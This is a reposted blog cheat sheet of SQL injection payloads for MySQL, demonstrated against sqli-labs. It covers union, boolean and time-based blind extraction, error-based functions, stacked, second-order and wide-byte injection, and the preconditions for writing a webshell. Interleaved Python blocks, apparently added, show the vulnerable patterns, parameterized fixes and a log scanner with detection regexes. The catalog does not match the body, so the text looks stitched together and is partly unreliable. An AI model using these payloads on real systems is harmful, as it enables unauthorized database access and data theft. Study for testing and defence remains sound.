
[network security] SQL injection syntax summary

2022-07-07 14:04:00 Penguin jumping stairs

Catalog

One. Principle

Two. SQL injection detection methods

1. Character-type detection

2. Numeric-type detection

3. Search-type and other detection

Three. union injection

1. order by to determine the number of columns

2. union joint query

Four. Blind injection

1. Boolean-based blind injection

(1) Query the database name length

(2) Query the current database name

(3) Query the number of tables in the database

(4) Query the first table name in the database

(5) Query the first character of the first table name in the database

(6) Determine the length of the first column of a table in the database

(7) Query the first character of the first column of a table in the database

(8) Get the first character of the first value in the column

2. Time-based blind injection

(1) Determine whether a delay function is available

(2) Query the length of the current database; if correct, delay 5 seconds

(3) Determine whether the first character of the current database name is a

(4) Determine whether the ASCII code of the first character of the current database name is 100

(5) Query the number of tables

(6) Query the table name length

(7) Extract the first character of the table name

(8) Query the number of columns

(9) Query the column name length

(10) Extract the first character of the column name

(11) Query the length of the first id value

(12) Get the data contents

Five. Error-based injection

(1) floor()

(2) extractvalue()

(3) updatexml()

(4) geometrycollection()

(5) multipoint()

(6) polygon()

(7) multipolygon()

(8) linestring()

(9) multilinestring()

(10) exp()

Six. Stacked injection

Seven. Second-order injection

(1) Insert malicious data

(2) Reference malicious data

Eight. Wide-byte injection

(1) Principle

(2) Conditions

Nine. DNSlog injection

(1) Conditions

Ten. Request header injection

Eleven. Writing a webshell via SQL injection

Twelve. Summary


One. Principle

So-called SQL injection means inserting SQL commands into a web form submission, a domain name input, or the query string of a page request, so that the server is finally tricked into executing malicious SQL commands.
SQL syntax allows database commands to be mixed with user data. If developers are not careful, user data may be interpreted as commands; in that case a remote user can not only enter data into the web application but also execute arbitrary commands on the database.

Two. SQL injection detection methods

1. Character-type detection

To judge whether a character-type URL parameter is injectable, append a single quotation mark to the URL:

url: http://127.0.0.1/sqli-labs-master/Less-1/?id=1'

An error is displayed, roughly saying that you have an SQL syntax error; when %23 (the URL-encoded # comment marker) is appended, the page displays normally again.

When we append and 1=1 after the single quotation mark in the URL, the page displays normally:

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1=1#

When we change 1=1 to 1=2, the page reports an error:

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1=2#

2. Numeric-type detection

Append and 1=1 directly and look at the result:

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=1

The page may display normally; then make a further judgment with 1=2:

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=2

If the page changes, we can judge that this is numeric injection, because numeric injection does not need quotation marks: the parameter is treated like an int.

3. Search-type and other detection

These are variants of character-type detection; the only difference is that the enclosing structure must be closed according to the different error messages.
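The behaviour the detection steps above rely on, as a small runnable illustration added here (example code, not from the page or from sqli-labs): an in-memory SQLite table, the two vulnerable query shapes, and a parameterized lookup that the same inputs cannot influence. SQLite stands in for MySQL, so the comment marker is `--` rather than `#`.

```python
import sqlite3

# Constructed in-memory stand-in for the "users" table behind the page's ?id= lookups
# (added example, not the sqli-labs code or the page author's code).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn

def numeric_vulnerable(conn, raw_id: str):
    # Numeric pattern: the parameter is pasted into the query text without quotes.
    return conn.execute(f"SELECT username FROM users WHERE id={raw_id}").fetchall()

def string_vulnerable(conn, raw_id: str):
    # Character pattern: the parameter sits inside single quotes, so a stray quote
    # breaks the syntax. The comment marker is # (%23) in MySQL; SQLite understands --.
    return conn.execute(f"SELECT username FROM users WHERE id='{raw_id}'").fetchall()

def probe(query_fn, raw_id: str) -> str:
    """Classify what a client would observe for one input: 'rows', 'empty' or 'error'."""
    conn = make_db()
    try:
        rows = query_fn(conn, raw_id)
    except sqlite3.Error:
        return "error"
    return "rows" if rows else "empty"

def lookup_parameterized(raw_id: str):
    # Hardened form: validate the expected type, then bind the value so the database
    # never parses it as SQL. The and 1=1 / and 1=2 probes no longer reach the query.
    if not raw_id.isdigit():
        raise ValueError("id must be a positive integer")
    conn = make_db()
    return conn.execute("SELECT username FROM users WHERE id=?", (int(raw_id),)).fetchall()

def parameterized_accepts(raw_id: str) -> bool:
    """True when the hardened lookup accepts the input, False when it rejects it."""
    try:
        lookup_parameterized(raw_id)
    except ValueError:
        return False
    return True
```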

Three. union injection

1. order by with error-based injection

select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.schemata)),0));

2. union joint query

?id=111' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='<database name>') --+

Four. Blind injection

1. Boolean-based blind injection

(1) Query the database name length

and (length(database()))>8%23

(2) Query the current database name

and (ascii(substr(database(),1,1)))<120 %23

(3) Query the number of tables in the database

and (select count(*) from information_schema.tables where table_schema='<database name>')>4 %23

(4) Query the first table name in the database

and (length((select table_name from information_schema.tables where table_schema='<database name>' limit 0,1)))=6%23

(5) Query the first character of the first table name in the database

and (ascii(substr((select table_name from information_schema.tables where table_schema='<database name>' limit 0,1),1,1))>100)%23

(6) Determine the length of the first column of a table in the database

and (length((select column_name from information_schema.columns where table_schema='<database name>' and table_name='<table name>' limit 0,1)))=2%23

(7) Query the first character of the first column of a table in the database

and (ascii(substr((select column_name from information_schema.columns where table_schema='<database name>' and table_name='<table name>' limit 0,1),1,1)))=105 %23

(8) Get the first character of the first value in the column

and (ascii(substr((select <column name> from <table name> limit 0,1),1,1)))=68 %23

2. Time-based blind injection

(1) Determine whether a delay function is available

and sleep(5) %23

(2) Query the length of the current database; if correct, delay 5 seconds

and if((length(database()))>7,sleep(5),1) --+

(3) Determine whether the first character of the current database name is a

and if((substr(database(),1,1)='a'),sleep(5),1) %23

(4) Determine whether the ASCII code of the first character of the current database name is 100

and if((ascii(substr(database(),1,1))=100),sleep(5),1) %23

(5) Query the number of tables

and if((select count(*) from information_schema.tables where table_schema='<database name>')=4,sleep(5),1)%23

(6) Query the table name length

and if((select length((select table_name from information_schema.tables where table_schema='<database name>' limit 3,1))=5),sleep(5),1)%23

(7) Extract the first character of the table name

and if((select ascii(substr((select table_name from information_schema.tables where table_schema='<database name>' limit 3,1),1,1)))=117,sleep(5),1)%23

(8) Query the number of columns

and if(((select count(*) from information_schema.columns where table_schema='<database name>' and table_name='users')=3),sleep(5),1)%23

(9) Query the column name length

and if((select length((select column_name from information_schema.columns where table_schema='<database name>' and table_name='<table name>' limit 0,1))=2),sleep(5),1)%23

(10) Extract the first character of the column name

and if((select ascii(substr((select column_name from information_schema.columns where table_schema='<database name>' and table_name='<table name>' limit 0,1),1,1)))=105,sleep(5),1)%23

(11) Query the length of the first id value

and if((select length((select id from <table name> limit 0,1)))=1,sleep(5),1)%23

(12) Get the data contents

and if((select ascii(substr((select id from <table name> limit 0,1),1,1)))=49,sleep(5),1)%23

Five. Error-based injection

(1) floor()

and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) %23

(2) extractvalue()

select * from <database name> where id=1 and (extractvalue(1,concat(0x7e,(select <table name>()),0x7e)));

(3) updatexml()

select * from <database name> where id=1 and (updatexml(1,concat(0x7e,(select <table name>()),0x7e),1));

(4) geometrycollection()

select * from <database name> where id=1 and geometrycollection((select * from(select * from(select <table name>())a)b));

(5) multipoint()

select * from <database name> where id=1 and multipoint((select * from(select * from(select <table name>())a)b));

(6) polygon()

select * from <database name> where id=1 and polygon((select * from(select * from(select <table name>())a)b));

(7) multipolygon()

select * from <database name> where id=1 and multipolygon((select * from(select * from(select <table name>())a)b));

(8) linestring()

select * from <database name> where id=1 and linestring((select * from(select * from(select <table name>())a)b));

(9) multilinestring()

select * from <database name> where id=1 and multilinestring((select * from(select * from(select <table name>())a)b));

(10) exp()

select * from <database name> where id=1 and exp(~(select * from(select <table name>())a));
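From the defender's side, the payload shapes catalogued in the union, blind and error-based sections are also what an access-log review looks for. The following is added example code (not from the page): it decodes request paths from a constructed common-log-format sample and flags lines matching those shapes; the signature names and the log lines are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the payload shapes in the union, blind and error-based sections
# above; the keys are alert labels. Constructed for this example, not a vendor ruleset.
SIGNATURES = {
    "union-select":  re.compile(r"\bunion\b[\s/*]+(all\s+)?select\b", re.I),
    "schema-read":   re.compile(r"\binformation_schema\.", re.I),
    "boolean-probe": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "time-based":    re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "error-based":   re.compile(r"\b(updatexml|extractvalue|floor\s*\(\s*rand)\s*\(", re.I),
    "stacked":       re.compile(r";\s*(select|show|insert|update|delete|drop)\b", re.I),
}

# Common-log-format request line: client, timestamp, method, path, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def classify(line: str):
    """Decode one access-log line and return {'ip', 'path', 'hits'}, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Two decode passes so that double-encoded payloads (%2527 -> %27 -> ') are also seen.
    decoded = unquote_plus(unquote_plus(m["path"]))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    return {"ip": m["ip"], "path": decoded, "hits": hits}

def scan(log_text: str) -> list:
    """Return the records for every line that matched at least one signature."""
    return [rec for rec in map(classify, log_text.splitlines()) if rec and rec["hits"]]

# Constructed sample log, modelled on the sqli-labs URLs used above.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Jul/2022:14:04:00 +0800] "GET /Less-1/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [07/Jul/2022:14:04:03 +0800] "GET /Less-1/?id=1%27%20and%201%3D2%23 HTTP/1.1" 200 498
10.0.0.5 - - [07/Jul/2022:14:04:09 +0800] "GET /Less-1/?id=1%27%20and%20if((length(database()))%3E7,sleep(5),1)--+ HTTP/1.1" 200 512
10.0.0.5 - - [07/Jul/2022:14:04:15 +0800] "GET /Less-1/?id=111%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables)--+ HTTP/1.1" 200 731
10.0.0.7 - - [07/Jul/2022:14:05:00 +0800] "GET /search?q=union%20station HTTP/1.1" 200 2048
"""
```

The last line is a benign query containing the word "union" and is deliberately not flagged, since the union signature requires a following select.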

Six. Stacked injection

Principle: mysqli_multi_query() supports executing several SQL statements at once, so statements separated by ; are executed one after another ("stacked").

For example:

select * from users;show databases;

The two statements above are simply executed together, so we can insert, delete, update and select, as long as the privileges are sufficient.
Although this injection form is very powerful, it is rarely seen in practice. It may be limited by the API or the database engine, or by permissions, and it only works when the function that calls the database supports multiple statements: mysqli_multi_query() executes several SQL statements at once, but in practice, for example in PHP, the function usually used to call the database is mysqli_query(), which executes only one statement, and whatever follows the semicolon is not executed. The conditions for stacked injection are therefore very limited, but once it can be used it may pose a great threat to the website.

Seven. Second-order injection

Second-order injection can be summarized in the following two steps:

(1) Insert malicious data

When data is inserted into the database, special characters are escaped, but what is written to and retained in the database is the original (unescaped) data.

(2) Reference malicious data

The data stored in the database is assumed to be safe by default, so when a later query is built, the malicious data is extracted directly from the database and used without further inspection.
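The two steps above, played out as an added example (not the page's code) against an in-memory SQLite table: escaping on insert stores the constructed username admin'-- as a legitimate row, and a later password-change query that trusts the stored value rewrites the real admin row, while the parameterized version of the same query does not. Table contents and function names are constructed for this example.

```python
import sqlite3

def escape_for_insert(value: str) -> str:
    # First-order defence on the insert path: doubles single quotes (SQLite's convention;
    # addslashes()/mysqli_real_escape_string() play the same role in PHP with MySQL).
    return value.replace("'", "''")

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'original')")  # constructed sample row
    return conn

def register(conn, username: str, password: str) -> None:
    # Step (1): the value is escaped, the INSERT succeeds, and the database now holds the
    # original, unescaped text admin'-- as a perfectly valid username.
    conn.execute(f"INSERT INTO users VALUES ('{escape_for_insert(username)}', "
                 f"'{escape_for_insert(password)}')")

def stored_username(conn, username: str) -> str:
    return conn.execute("SELECT username FROM users WHERE username=?", (username,)).fetchone()[0]

def change_password_vulnerable(conn, session_user: str, new_password: str) -> None:
    # Step (2): the username is read back from the database, trusted as "already safe" and
    # concatenated into the UPDATE. For admin'-- the clause becomes username='admin'--',
    # so the statement targets the real admin row instead of the caller's own.
    name = stored_username(conn, session_user)
    conn.execute(f"UPDATE users SET password='{escape_for_insert(new_password)}' "
                 f"WHERE username='{name}'")

def change_password_safe(conn, session_user: str, new_password: str) -> None:
    # Hardened form: every query binds its values, regardless of where they came from.
    name = stored_username(conn, session_user)
    conn.execute("UPDATE users SET password=? WHERE username=?", (new_password, name))

def password_of(conn, username: str) -> str:
    return conn.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()[0]

def run(change_fn) -> str:
    """Register the crafted account, change its password via change_fn, return admin's password."""
    conn = make_db()
    register(conn, "admin'--", "x")
    change_fn(conn, "admin'--", "hijacked")
    return password_of(conn, "admin")
```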

Eight. Wide-byte injection

(1) Principle

When a parameter such as id=1' is passed, the single quotation mark we enter is treated as an illegal character, and the filter function escapes it by adding a "\". If we want the program to accept a parameter that contains a single quotation mark, we need to get rid of this escape character "\". How can it be removed? HTTP transmits the request URL-encoded, and if that encoding is complete, the server decodes it on arrival. We can put %81, which is itself an encoded byte, in front of the single quotation mark; when the server decodes, %81 and the code of "\" are combined and decoded together as one GBK character, so all that remains is a bare single quotation mark.

(2) Conditions

Ⅰ: The database query is set to GBK encoding
Ⅱ: Functions such as addslashes(), mysql_real_escape_string() or mysql_escape_string() are used
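The decoding sequence the principle describes, as an added example (not the page's code): an emulation of addslashes() on raw bytes followed by a GBK decode, beside the charset-aware order of operations (decode first, then escape) that mysqli_set_charset() combined with mysqli_real_escape_string() provides in PHP. The page's %81 lead byte is used; the function names are constructed for this example.

```python
from urllib.parse import unquote_to_bytes

def addslashes(data: bytes) -> bytes:
    # Byte-oriented escaping in the manner of PHP's addslashes(): a backslash before
    # ' " \ and NUL, with no knowledge of which bytes together form one GBK character.
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def byte_escape_then_gbk(url_value: str) -> str:
    """Vulnerable order of operations: escape the raw bytes, decode as GBK afterwards."""
    raw = unquote_to_bytes(url_value)   # "1%81'" -> b"1\x81'"
    escaped = addslashes(raw)           # b"1\x81\\'"  i.e. 0x31 0x81 0x5C 0x27
    # 0x81 is a GBK lead byte and 0x5C a valid trail byte, so the pair decodes as ONE
    # CJK character: the backslash is swallowed and the quote that follows is left bare.
    return escaped.decode("gbk")

def quote_survives(url_value: str) -> bool:
    """True when an unescaped single quote reaches the SQL text via the vulnerable path."""
    text = byte_escape_then_gbk(url_value)
    return "'" in text and "\\'" not in text

def charset_aware_escape(url_value: str) -> str:
    """Hardened order: decode with the connection charset first, then escape characters."""
    raw = unquote_to_bytes(url_value)
    try:
        text = raw.decode("gbk")        # a lone 0x81 directly before a quote is not valid GBK
    except UnicodeDecodeError as exc:
        raise ValueError("malformed GBK input rejected") from exc
    return text.replace("\\", "\\\\").replace("'", "\\'")

def hardened_rejects(url_value: str) -> bool:
    """True when the charset-aware path refuses the input as malformed."""
    try:
        charset_aware_escape(url_value)
    except ValueError:
        return True
    return False
```

Prepared statements remove the escaping step entirely and are the preferred fix; charset-aware escaping is the minimum for code that still builds SQL strings.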

Nine. DNSlog injection

(1) Conditions

secure_file_priv in mysql.ini must be empty:
secure_file_priv set to NULL: import and export are not allowed
secure_file_priv set to /tmp: import and export are only allowed under the /tmp directory
secure_file_priv set to the empty string: import and export are allowed without restriction

Ten. Writing a webshell via SQL injection

(1) Conditions

Ⅰ: The current SQL injection user must have DBA privileges (--is-dba is true)

Ⅱ: The absolute path of the website must be known

Ⅲ: The secure_file_priv="" setting in the My.ini configuration file is empty

Eleven. Summary

This information was collected over a long time; I hope all my technical friends can read it through to the end.

Original site

Copyright notice
This article was created by [Penguin jumping stairs]; please include the original link when reposting. Thanks.
https://yzsam.com/2022/188/202207071159528758.html